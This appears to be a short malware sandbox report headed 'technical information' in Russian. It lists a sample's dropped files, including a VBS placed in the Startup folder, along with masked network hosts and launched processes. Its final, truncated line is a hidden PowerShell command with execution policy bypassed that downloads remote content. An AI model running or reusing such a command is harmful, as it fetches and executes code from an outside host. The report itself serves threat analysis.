Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\1.vbs
- %TEMP%\aut1.tmp
- %TEMP%\1.vbs
- %TEMP%\aut2.tmp
- %TEMP%\bein.m3u
- %TEMP%\aut1.tmp
- %TEMP%\aut2.tmp
- 'localhost':1037
- '46.##1.250.197':8900
- 'sw##.fannan.se':8000
- DNS ASK sw##.fannan.se
- ClassName: 'ReBarWindow32' WindowName: ''
- ClassName: 'WMP9DeskBand' WindowName: 'WMP9DeskBand'
- '<SYSTEM32>\wscript.exe' "%TEMP%\1.vbs"
- '%ProgramFiles%\Windows Media Player\wmplayer.exe' /prefetch:6 /Open "%TEMP%\bein.m3u"
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient....